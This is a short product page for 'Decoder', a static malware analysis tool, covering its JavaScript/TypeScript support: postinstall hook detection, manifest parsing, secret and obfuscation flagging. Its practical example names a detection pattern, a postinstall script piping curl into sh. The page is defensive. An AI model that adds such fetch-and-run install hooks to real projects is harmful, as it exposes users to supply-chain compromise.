JavaScript & TypeScript — Supported formats
JavaScript and TypeScript are first-class in Decoder. Upload single files, ZIPs, or import a GitHub repo.
What it is
Static + malware analysis for the JS/TS ecosystem.
Why it's useful
Most supply-chain attacks ship through npm — pattern detection plus manifest parsing matters.
How Decoder implements it
Language-aware rules, package.json parsing, postinstall hook detection, entropy + obfuscation signals.
When to use it
Any JS/TS project review, especially fresh npm dependencies.
When NOT to use it
Runtime taint tracking — Decoder is static.
Practical example
A postinstall script with curl|sh trips supply-chain alarms.
FAQ
Glossary
- Postinstall
- npm lifecycle script that runs after install — common attack vector.
Related
Static malware analysis inspects code and binaries without executing them. Decoder runs it locally on your upload and surfaces suspicious patterns, entropy spikes and known indicators — no API key required.
A leaked key is the most common breach vector. Decoder combines provider-specific regex (AWS, GitHub, Stripe…) with entropy to flag secrets that don't belong in code.
Most code in any modern project isn't yours. Decoder reads manifests and lockfiles to map the dependency surface and flag suspicious entries.
Obfuscation hides intent. Decoder flags suspicious entropy, base64 walls, eval chains, and packing markers so reviewers can focus on what's actually hidden.